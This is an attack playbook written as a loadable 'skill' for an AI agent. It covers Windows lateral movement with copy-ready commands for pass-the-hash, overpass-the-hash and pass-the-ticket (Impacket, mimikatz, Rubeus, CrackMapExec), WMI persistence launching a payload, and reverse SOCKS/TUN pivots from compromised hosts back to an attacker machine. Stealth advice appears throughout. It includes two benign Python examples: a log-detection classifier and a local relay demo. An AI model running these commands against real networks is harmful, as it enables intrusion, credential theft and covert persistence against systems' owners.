windows-lateral-movement

SKILL: Windows Lateral Movement — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert Windows lateral movement techniques. Covers PsExec, WMI, WinRM, DCOM, SMB, RDP, SSH, pass-the-hash, overpass-the-hash, pass-the-ticket, and pivoting. Base models miss the execution-method fingerprints each technique leaves in logs, the OPSEC trade-offs, and the credential type each method accepts.
0. RELATED ROUTING

Before going deep, consider loading:
- windows-privilege-escalation after landing on a new host, for local escalation
- windows-av-evasion when EDR blocks lateral movement tools
- active-directory-kerberos-attacks for Kerberos-based lateral movement (pass-the-ticket, delegation)
- active-directory-acl-abuse for ACL-based paths to new hosts

Advanced Reference

Also load CREDENTIAL_DUMPING.md when you need:
- LSASS dump techniques (MiniDump, comsvcs.dll, nanodump)
- SAM/SYSTEM/SECURITY extraction
- DPAPI, Credential Manager, cached domain credentials
- NTDS.dit extraction methods
1. REMOTE EXECUTION METHODS COMPARISON

| Method | Port | Cred Type | Creates Service? | File on Disk? | Stealth | Rights Required |
|---|---|---|---|---|---|---|
| PsExec (Sysinternals) | 445 (SMB) | Password, or current logon context (e.g. after mimikatz pth) | Yes (PSEXESVC) | Yes (PSEXESVC.exe copied to ADMIN$) | Low | Local admin |
| Impacket psexec | 445 (SMB) | Password/Hash/Ticket | Yes (random 4-letter name) | Yes (random 8-letter .exe in ADMIN$) | Low | Local admin |
| Impacket smbexec | 445 | Password/Hash/Ticket | Yes (one temporary service per command, no binary) | Temporary .bat and output file, deleted after each command | Medium | Local admin |
| Impacket atexec | 445 | Password/Hash/Ticket | No (scheduled task, deleted after run) | Temporary output file under C:\Windows\Temp | Medium | Local admin |
| WMI (wmiexec) | 135 + dynamic RPC port | Password/Hash/Ticket | No | No payload; wmiexec collects output via a file on ADMIN$ unless -nooutput | High | Local admin |
| WinRM | 5985/5986 | Password/Hash/Ticket | No | No | High | Local admin or Remote Management Users |
| DCOM | 135 + dynamic RPC port | Password/Hash/Ticket | No | No (dcomexec collects output like wmiexec) | High | Local admin |
| RDP | 3389 | Password; Hash only with Restricted Admin mode | No | No | Low (interactive GUI session, full logon) | Remote Desktop Users (Restricted Admin additionally needs local admin) |
| SSH | 22 | Password/Key | No | No | High | SSH enabled and shell access |
| sc.exe | 445 (SCM over named pipe) | Password, or current logon context | Yes (custom service) | Yes (service binary) | Low | Local admin |

Reading the table: "135 + dynamic RPC port" means the endpoint mapper on 135 hands the client a high port from the dynamic range (49152-65535 by default), so a firewall that opens only 135 still blocks WMI and DCOM. "Stealth" is relative: every method produces a 4624 network logon on the target; the SMB-based ones (PsExec, smbexec, atexec) add a service-install (7045) or task-creation (4698) event on top. For local (non-domain) accounts, UAC remote restrictions give every member of Administrators except the built-in RID-500 Administrator a filtered token over the network, so pass-the-hash with another local admin's hash fails unless LocalAccountTokenFilterPolicy is 1; domain accounts are not filtered.
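Added example (mine, not code from the playbook or from any tool it lists): a small Python classifier that turns the table's "creates service / file on disk" columns into detection rules and runs them over constructed event records shaped like the real Security and System events (7045 service install, 4698 task creation, 4688 process creation, 4624 logon, 4768 TGT request). Field names mirror the event XML data names; the service, task and user names are made up; `fingerprint` and `triage` are hypothetical helper names.

```python
"""Map Windows event records to the lateral-movement method that produced them.

Added example, not from the original playbook. The rules encode the artefacts
each method in the comparison table leaves behind; the event records below are
constructed to mirror the fields of the real Security/System events.
"""
from __future__ import annotations

import re

# Constructed sample events (not captured logs). Keys follow the event XML data
# names: ServiceName/ImagePath (7045), TaskName/TaskContent (4698),
# ParentProcessName/NewProcessName (4688), LogonType/... (4624), ... (4768).
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    {"EventID": 7045, "ServiceName": "BTOBTO",
     "ImagePath": "%COMSPEC% /Q /c echo cd ^> \\\\127.0.0.1\\C$\\__output 2^>^&1 > "
                  "%TEMP%\\execute.bat & %COMSPEC% /Q /c %TEMP%\\execute.bat & del %TEMP%\\execute.bat"},
    {"EventID": 7045, "ServiceName": "vGhX", "ImagePath": "%SystemRoot%\\kQjwRtPl.exe"},
    {"EventID": 4698, "TaskName": "\\QzrWtKpb",
     "TaskContent": "<Exec><Command>cmd.exe</Command><Arguments>/C whoami &gt; "
                    "\\Windows\\Temp\\QzrWtKpb 2&gt;&amp;1</Arguments></Exec>"},
    {"EventID": 4688, "ParentProcessName": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe"},
    {"EventID": 4688, "ParentProcessName": "C:\\Windows\\System32\\wsmprovhost.exe",
     "NewProcessName": "C:\\Windows\\System32\\whoami.exe"},
    {"EventID": 4688, "ParentProcessName": "C:\\Windows\\System32\\mmc.exe",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM", "TargetUserName": "administrator"},
    {"EventID": 4624, "LogonType": 10, "AuthenticationPackageName": "Negotiate", "RestrictedAdminMode": "Yes"},
    {"EventID": 4768, "TargetUserName": "svc_backup", "TicketEncryptionType": "0x17"},
]


def fingerprint(ev: dict) -> str | None:
    """Return the lateral-movement method an event is characteristic of, or None."""
    eid = ev.get("EventID")
    if eid == 7045:  # System log: a service was installed
        name, image = ev.get("ServiceName", ""), ev.get("ImagePath", "")
        if name == "PSEXESVC":
            return "Sysinternals PsExec (fixed service name, PSEXESVC.exe in ADMIN$)"
        if image.upper().startswith("%COMSPEC% /Q /C ECHO"):
            return "Impacket smbexec (cmd one-liner as service binary, one 7045 per command)"
        if re.fullmatch(r"[A-Za-z]{4}", name) and re.fullmatch(r"%SystemRoot%\\[A-Za-z]{8}\.exe", image):
            return "Impacket psexec (random 4-letter service, random 8-letter .exe in ADMIN$)"
        return None
    if eid == 4698:  # Security: scheduled task created
        content = ev.get("TaskContent", "")
        if "<Command>cmd.exe</Command>" in content and "\\Windows\\Temp\\" in content:
            return "Impacket atexec (task runs cmd.exe with output redirected under \\Windows\\Temp)"
        return None
    if eid == 4688:  # Security: process creation; the parent tells you the transport
        parent = ev.get("ParentProcessName", "").lower().rsplit("\\", 1)[-1]
        return {
            "wmiprvse.exe": "WMI Win32_Process.Create (wmiexec / Invoke-WmiMethod)",
            "wsmprovhost.exe": "WinRM (evil-winrm / PowerShell remoting)",
            "mmc.exe": "DCOM MMC20.Application (confirm mmc.exe was started by svchost DcomLaunch with -Embedding)",
        }.get(parent)
    if eid == 4624:  # Security: logon; type 3 = network, 10 = RDP
        if ev.get("LogonType") == 10 and ev.get("RestrictedAdminMode") == "Yes":
            return "RDP in Restricted Admin mode (the only way RDP accepts a hash)"
        if ev.get("LogonType") == 3 and ev.get("AuthenticationPackageName") == "NTLM":
            return "Network logon over NTLM: consistent with pass-the-hash (not proof on its own)"
        return None
    if eid == 4768 and ev.get("TicketEncryptionType") == "0x17":  # DC: TGT issued with RC4
        return "RC4 TGT request: overpass-the-hash with an NT hash (or a legacy client)"
    return None


def triage(events: list[dict]) -> list[tuple[int, str]]:
    """(EventID, verdict) for every event that matched a rule."""
    return [(ev["EventID"], v) for ev in events if (v := fingerprint(ev))]


if __name__ == "__main__":
    for eid, verdict in triage(SAMPLE_EVENTS):
        print(f"{eid}: {verdict}")
```

The 4624/NTLM rule is deliberately weak: NTLM network logons are normal in most domains, so it only becomes interesting in combination with a 7045/4698/4688 hit on the same host within the same minute, which is how a real correlation rule would use it.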
2. PSEXEC VARIANTS

Impacket psexec

```bash
# With password
psexec.py DOMAIN/administrator:password@TARGET_IP

# With NTLM hash (pass-the-hash); the LM half before the colon is left empty
psexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP

# With Kerberos ticket (ccache); the target must be an FQDN so the service ticket's SPN matches
export KRB5CCNAME=admin.ccache
psexec.py -k -no-pass DOMAIN/administrator@target.domain.com
```

Fingerprint: a randomly named binary is uploaded to ADMIN$ and registered as a randomly named service (System event 7045), and the shell runs over a named pipe. Noisy, but the service and binary are removed on exit.

Impacket smbexec (no binary upload)

```bash
smbexec.py DOMAIN/administrator:password@TARGET_IP
smbexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP
```

Each command is executed by creating and starting a service whose binary path is a cmd.exe one-liner: it writes the command into a .bat file, runs it with output redirected to a file on the share, then deletes the .bat and the service. No attacker binary lands on disk, but there is still one 7045 per command, and an ImagePath starting with "%COMSPEC% /Q /c echo" is its signature.

Impacket atexec (scheduled task)

```bash
atexec.py DOMAIN/administrator:password@TARGET_IP "whoami"
atexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP "whoami"
```

Registers a scheduled task over the Task Scheduler RPC interface (\pipe\atsvc), runs it, reads the output file back from ADMIN$, then deletes the task. One command per invocation, no interactive shell; Security event 4698 on the target.

Sysinternals PsExec

```cmd
PsExec64.exe \\TARGET -u DOMAIN\administrator -p password cmd.exe
REM -s runs the command as SYSTEM on the target
PsExec64.exe \\TARGET -s cmd.exe
REM -d returns immediately instead of waiting for the process; -accepteula suppresses the EULA dialog
PsExec64.exe \\TARGET -accepteula -s -d cmd.exe /c "C:\temp\payload.exe"
```

Without -u/-p, PsExec authenticates with the current logon context, which is how it is used after mimikatz sekurlsa::pth (§6). The service name is always PSEXESVC and PSEXESVC.exe is copied to ADMIN$, so both the 7045 event and the file are well-known signatures.

---
3. WMI LATERAL MOVEMENT
Impacket wmiexec

```bash
# Semi-interactive shell via Win32_Process.Create over DCOM/RPC (135 + dynamic port)
wmiexec.py DOMAIN/administrator:password@TARGET_IP
wmiexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP

# With Kerberos
export KRB5CCNAME=admin.ccache
wmiexec.py -k -no-pass DOMAIN/administrator@target.domain.com
```

OPSEC: no service and no uploaded binary, but by default wmiexec retrieves command output by redirecting it to a file under ADMIN$ and reading it back over SMB (port 445). Use -nooutput for fire-and-forget execution with no SMB traffic at all. Child processes are spawned by WmiPrvSE.exe, which is the usual hunting pivot (4688 / Sysmon 1 with that parent).

PowerShell WMI process creation

```powershell
$cred = Get-Credential
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\temp\out.txt" -ComputerName TARGET -Credential $cred
```

The call only returns a ProcessId and a ReturnValue (0 = success); output has to be written to a file or sent out by the command itself. The WMI cmdlets exist in Windows PowerShell only; on PowerShell 7 use Invoke-CimMethod over a CIM session.

WMI event subscription persistence

Not lateral movement itself, but the same WMI access lets you leave a permanent subscription on the host you just reached. A working subscription needs three objects: a filter (when), a consumer (what), and a binding between them.

```powershell
# 1. Filter: polls every 60 seconds and fires on any change to the perf counter instance (i.e. always)
$filterArgs = @{
    EventNamespace = 'root\cimv2'; Name = 'Updater';
    QueryLanguage = 'WQL';
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
}
$filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $filterArgs

# 2. Consumer: the command to run when the filter fires (runs as SYSTEM)
$consumerArgs = @{ Name = 'Updater'; CommandLineTemplate = 'C:\temp\payload.exe' }
$consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments $consumerArgs

# 3. Binding: ties the filter to the consumer
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{ Filter = $filter; Consumer = $consumer }
```

Add -ComputerName TARGET -Credential $cred to each Set-WmiInstance call to plant it remotely. Sysmon events 19/20/21 and Microsoft-Windows-WMI-Activity/Operational event 5861 record exactly these three objects, so this is persistence, not stealth.

---
4. WINRM LATERAL MOVEMENT
evil-winrm (from Linux)

```bash
# With password
evil-winrm -i TARGET_IP -u administrator -p password

# With NTLM hash
evil-winrm -i TARGET_IP -u administrator -H NTLM_HASH

# With Kerberos: ticket in KRB5CCNAME, /etc/krb5.conf pointing at the DC, target given as FQDN
export KRB5CCNAME=admin.ccache
evil-winrm -i target.domain.com -r DOMAIN.COM
```

PowerShell remoting (from a Windows foothold)

```powershell
$cred = Get-Credential

# Interactive session
Enter-PSSession -ComputerName TARGET -Credential $cred

# Execute command remotely
Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock { whoami }

# Multiple targets simultaneously (fan-out, one session per host)
Invoke-Command -ComputerName TARGET1,TARGET2 -Credential $cred -ScriptBlock { hostname; whoami }
```

Access check: WinRM requires membership in Administrators or Remote Management Users on the target, so a non-admin account can still get a shell (but not the ADMIN$-based methods). Over plain HTTP (5985) the SOAP body is still encrypted with the Kerberos/NTLM session key. Connecting by hostname uses Kerberos; connecting by IP address falls back to NTLM and, on the client side, needs the IP in the TrustedHosts list. Commands run under wsmprovhost.exe, and PowerShell script block logging (event 4104) captures everything you type if it is enabled.

---
5. DCOM LATERAL MOVEMENT
Stealthy: uses legitimate COM objects exposed over RPC (135 + dynamic port), creates no service and uploads nothing. Remote activation requires local admin on the target (default DCOM launch/activation permissions). The PowerShell variants run from a Windows host whose current logon context carries the credentials (e.g. after sekurlsa::pth, §6).

MMC20.Application

```powershell
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","TARGET"))
# ExecuteShellCommand(Command, Directory, Parameters, WindowState); "7" = minimized
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c whoami > C:\temp\out.txt","7")
```

Child process parent on the target is mmc.exe, itself started by svchost (DcomLaunch) with -Embedding.

ShellWindows

```powershell
# CLSID of ShellWindows
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","TARGET"))
$item = $com.Item()
# ShellExecute(File, Arguments, Directory, Operation, Show); 0 = hidden window
$item.Document.Application.ShellExecute("cmd.exe","/c whoami > C:\temp\out.txt","C:\Windows\System32",$null,0)
```

ShellBrowserWindow

```powershell
# CLSID of ShellBrowserWindow
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","TARGET"))
$com.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\Windows\System32",$null,0)
```

Caveat: ShellWindows and ShellBrowserWindow are served by the explorer.exe of an interactively logged-on user, so they only work when someone has a desktop session on the target, and the command then runs as that user (child of explorer.exe), not as the account you authenticated with. MMC20.Application has no such dependency.

Impacket dcomexec

```bash
dcomexec.py DOMAIN/administrator:password@TARGET_IP
# -object selects the COM object: ShellWindows (default), ShellBrowserWindow, or MMC20
dcomexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP -object MMC20
```

Like wmiexec, dcomexec collects output through a file on ADMIN$ over SMB unless -nooutput is given.

---
6. PASS-THE-HASH (PTH)
Use the NT hash directly without knowing the plaintext password. It works because NTLM network authentication only ever proves possession of the NT hash (the challenge response is keyed by the hash, never by the password), so for every NTLM-capable method the hash is as good as the password. Local accounts: only the built-in RID-500 Administrator (or any local admin when LocalAccountTokenFilterPolicy=1) gets a full token over the network.

```bash
# CrackMapExec: spray a hash across a range and report where it yields admin ("Pwn3d!")
# Add --local-auth for local accounts, which is where hash reuse across hosts usually pays off
crackmapexec smb TARGETS -u administrator -H NTLM_HASH

# Impacket tools (all accept -hashes LM:NT; leave LM empty)
psexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
wmiexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
smbexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET

# evil-winrm
evil-winrm -i TARGET -u user -H NTLM_HASH

# xfreerdp (the target must have Restricted Admin mode enabled)
xfreerdp /v:TARGET /u:administrator /pth:NTLM_HASH /d:DOMAIN
```

Mimikatz PTH (spawns a new process with the hash injected into its logon session; needs local admin / SeDebugPrivilege on the host you run it from)

```cmd
sekurlsa::pth /user:administrator /domain:DOMAIN /ntlm:HASH /run:cmd.exe
```

Anything launched from that cmd.exe (PsExec without -u/-p, the DCOM snippets in §5, dir \\TARGET\C$) authenticates outbound with the injected hash. whoami in the new process still shows your original user; the injected identity is only used for network authentication.

Enable Restricted Admin for RDP PTH

```cmd
REM On target (requires admin): 0 enables Restricted Admin mode
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
```

A Restricted Admin session keeps no reusable credentials in memory (that is its purpose), so from inside it you authenticate to further hosts as the target's computer account, not as the user. On the target, event 4624 with logon type 10 and "Restricted Admin Mode: Yes" is the indicator, and the registry change itself is an obvious one if the host is baselined.

---
7. OVERPASS-THE-HASH (PASS-THE-KEY)
Convert an NTLM hash (or AES key) → Kerberos TGT → pure Kerberos authentication from then on. It works because an account's RC4-HMAC Kerberos key (etype 23) is literally its NT hash, so the hash is enough to encrypt the AS-REQ pre-authentication timestamp.

```bash
# Request a TGT with the NT hash (the AS-REQ uses RC4)
getTGT.py DOMAIN/user -hashes :NTLM_HASH -dc-ip DC_IP
export KRB5CCNAME=user.ccache

# Or with the AES256 key (preferred: the request looks like a normal modern client)
getTGT.py DOMAIN/user -aesKey AES256_KEY -dc-ip DC_IP

# Use Kerberos for all subsequent tools; targets must be FQDNs so the service ticket's SPN matches
psexec.py -k -no-pass DOMAIN/user@target.domain.com
wmiexec.py -k -no-pass DOMAIN/user@target.domain.com
```

Mimikatz overpass-the-hash (use /aes256:KEY in place of /ntlm:HASH when you have the AES key, so the TGT request is not RC4)

```cmd
sekurlsa::pth /user:user /domain:DOMAIN /ntlm:HASH /run:powershell.exe
```

In the new PowerShell window the ticket cache starts empty; the first network access by hostname (e.g. dir \\dc.domain.com\C$) triggers the AS-REQ, after which klist shows the TGT.

Advantage: subsequent authentication is Kerberos, so targets log 4624 with AuthenticationPackage=Kerberos instead of NTLM and no NTLM traffic crosses the wire. Caveat: a TGT requested with the NT hash uses RC4 (TicketEncryptionType 0x17 in event 4768 on the DC), which stands out in a domain whose clients normally request AES; use the AES key when you have it. The hash is converted, not hidden.
---
8. PASS-THE-TICKET

Reuse a Kerberos ticket (TGT or service ticket) taken from another session or host. The ticket carries the principal's identity, so no password or hash is needed; a TGT is valid for 10 hours by default, a service ticket only for its SPN. Impacket's ticketConverter.py converts between Windows .kirbi and Linux .ccache in either direction.

```bash
# Use an existing .ccache ticket
export KRB5CCNAME=/path/to/admin.ccache
psexec.py -k -no-pass DOMAIN/admin@target.domain.com
```

Mimikatz: inject a .kirbi ticket into the current logon session

```cmd
kerberos::ptt ticket.kirbi
REM Verify
klist
```

Rubeus

```cmd
Rubeus.exe ptt /ticket:base64_blob
```

Check: klist must show the ticket with the expected client name, and the target must be addressed by the hostname in the ticket's SPN (cifs/FQDN, host/FQDN); by IP address Windows falls back to NTLM and the ticket is never used. Clock skew of more than 5 minutes against the DC breaks Kerberos entirely.

---
9. PIVOTING THROUGH COMPROMISED HOSTS
SSH tunnel / port forward

```bash
# Dynamic SOCKS proxy through the compromised host (SOCKS listener on your 127.0.0.1:1080)
ssh -D 1080 user@COMPROMISED_HOST
# Use with proxychains: put "socks5 127.0.0.1 1080" in /etc/proxychains.conf and prefix each tool with proxychains

# Local port forward: your 127.0.0.1:8888 reaches INTERNAL_TARGET:445 through the pivot
ssh -L 8888:INTERNAL_TARGET:445 user@COMPROMISED_HOST
```

Chisel (no SSH needed)

```bash
# On attacker (server): accept reverse tunnels from clients
chisel server --reverse -p 8080

# On compromised host (client): open a reverse SOCKS tunnel back to the server
chisel client ATTACKER:8080 R:socks
# Result: SOCKS5 proxy on the attacker's 127.0.0.1:1080, exiting from the compromised host
```

Ligolo-ng (modern, fast: a TUN interface instead of SOCKS, so tools need no proxychains and ICMP/UDP work too)

```bash
# On attacker: create the TUN interface once, then start the proxy
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
ligolo-proxy -selfcert -laddr 0.0.0.0:11601

# On compromised host
ligolo-agent -connect ATTACKER:11601 -retry -ignore-cert

# In the ligolo console
session   # select the agent
start     # start the tunnel

# Route the internal subnet through the tunnel
sudo ip route add INTERNAL_SUBNET/24 dev ligolo
```

Caveat for SOCKS-based pivots (ssh -D, chisel): only TCP traverses SOCKS, so ping does not work and nmap needs -sT -Pn; Kerberos and SMB are fine since the tools use TCP. Every method above carries your tool traffic out of the compromised host, so that host's network logs show it as the source of the lateral movement.

---
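Added example, mine and not code from ssh, chisel or Ligolo-ng: what `ssh -L 8888:INTERNAL_TARGET:445` actually does, as a threaded TCP relay that listens locally and copies bytes both ways to a target the caller could not reach directly. The "internal service" is a constructed echo server so the whole thing runs offline on 127.0.0.1; `forward`, `start_echo_server` and `roundtrip` are names chosen here, and `forward(0, ...)` binds an ephemeral port so the test needs no fixed port.

```python
"""A local port forward in ~40 lines: listen here, relay to a host the pivot can reach.

Added example, not from the original playbook or any tool it names.
"""
from __future__ import annotations

import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until EOF, then pass the EOF on to dst."""
    try:
        while chunk := src.recv(4096):
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _relay(client: socket.socket, target: tuple[str, int]) -> None:
    """One forwarded connection: dial the target, then pump both directions."""
    try:
        upstream = socket.create_connection(target, timeout=5)
    except OSError:
        client.close()          # target unreachable from the pivot: drop the client
        return
    threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()
    _pump(client, upstream)


def forward(listen_port: int, target: tuple[str, int], host: str = "127.0.0.1") -> int:
    """Equivalent of `ssh -L listen_port:target_host:target_port` run on this host.
    Returns the bound port (0 asks the OS for an ephemeral one)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, listen_port))
    srv.listen(16)

    def accept_loop() -> None:
        while True:
            client, _ = srv.accept()
            threading.Thread(target=_relay, args=(client, target), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def start_echo_server() -> int:
    """Constructed stand-in for the internal service (the SMB port in the playbook's example)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def serve() -> None:
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=_pump, args=(conn, conn), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def roundtrip(port: int, payload: bytes) -> bytes:
    """Send payload through the forwarder and return everything that comes back."""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)   # our EOF makes the echo side close after echoing
        out = b""
        while chunk := s.recv(4096):
            out += chunk
    return out


if __name__ == "__main__":
    internal = start_echo_server()
    local = forward(0, ("127.0.0.1", internal))
    print(roundtrip(local, b"bytes for the internal host, via the pivot"))
```

The relay is transparent to the protocol on top (SMB, RDP, anything TCP), which is exactly why the internal host sees the pivot's address as the client and why a SOCKS or TUN pivot needs nothing protocol-specific; the EOF handling in `_pump` is what lets half-closed connections finish cleanly instead of hanging, a detail most quick relays get wrong.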
---
10. LATERAL MOVEMENT DECISION TREE

Have credentials / hash — need to move laterally
│
├── What credentials do you have?
│   ├── Plaintext password → any method
│   ├── NTLM hash → PTH methods (§6)
│   │   ├── Need stealthier? → Overpass-the-Hash first (§7), with the AES key if you have it
│   │   └── Direct use → psexec/wmiexec/smbexec with -hashes, evil-winrm with -H
│   ├── Kerberos ticket → Pass-the-Ticket (§8)
│   └── AES key → Overpass-the-Hash with -aesKey (§7)
│
├── OPSEC priority?
│   ├── High stealth needed
│   │   ├── WMI (no file on disk, no service) → wmiexec, ideally -nooutput (§3)
│   │   ├── DCOM (uses legitimate COM) → dcomexec (§5)
│   │   └── WinRM (PowerShell remoting) → evil-winrm (§4)
│   ├── Moderate stealth
│   │   ├── smbexec (service per command, no binary upload) (§2)
│   │   └── atexec (scheduled task, auto-cleanup) (§2)
│   └── Low stealth acceptable
│       ├── PsExec (reliable, creates service and drops a binary) (§2)
│       └── RDP (interactive GUI, full logon session, screen visible to the user) (§6)
│
├── Need to pivot to the internal network?
│   ├── SSH available → SSH tunnel / SOCKS (§9)
│   ├── No SSH → Chisel or Ligolo-ng (§9)
│   └── Multiple hops → chain SOCKS proxies (proxychains supports a chain)
│
├── Target hardening?
│   ├── SMB signing required → blocks NTLM relay only; with a real password, hash or ticket every method still works
│   ├── WinRM disabled → WMI or DCOM
│   ├── Firewall blocks 135/445 → WinRM (5985/5986), RDP (3389) or SSH (22)
│   ├── Restricted Admin disabled → no RDP PTH → another method, or a plaintext password
│   └── Local account that is not RID-500 → token filtered over the network → domain account or RID-500
│
└── Need to dump creds on the new host?
    └── Load CREDENTIAL_DUMPING.md